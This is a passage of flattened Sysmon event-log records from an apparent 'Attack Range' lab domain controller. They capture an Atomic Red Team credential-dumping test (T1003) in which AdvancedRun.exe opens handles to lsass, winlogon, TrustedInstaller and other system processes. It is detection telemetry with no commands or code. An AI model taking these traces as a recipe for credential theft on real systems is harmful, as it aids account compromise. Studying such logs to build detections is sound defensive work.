n.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000003952053Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7803-000000002702}4916C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003952052Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952051Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952050Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.308{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952049Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000003952048Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003952046Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952041Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.308{834264DD-DAE4-61EA-0C00-000000002702}652332C:\Windows\system32\lsass.exe{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003952040Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21f3|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21bd|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952039Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-ED47-61EA-7A03-000000002702}5868C:\Windows\servicing\TrustedInstaller.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952038Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-ED47-61EA-7803-000000002702}4916C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952037Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-ED46-61EA-7703-000000002702}4640C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952036Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952035Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952034Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program 
Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952033Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003952032Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952031Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003952029Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
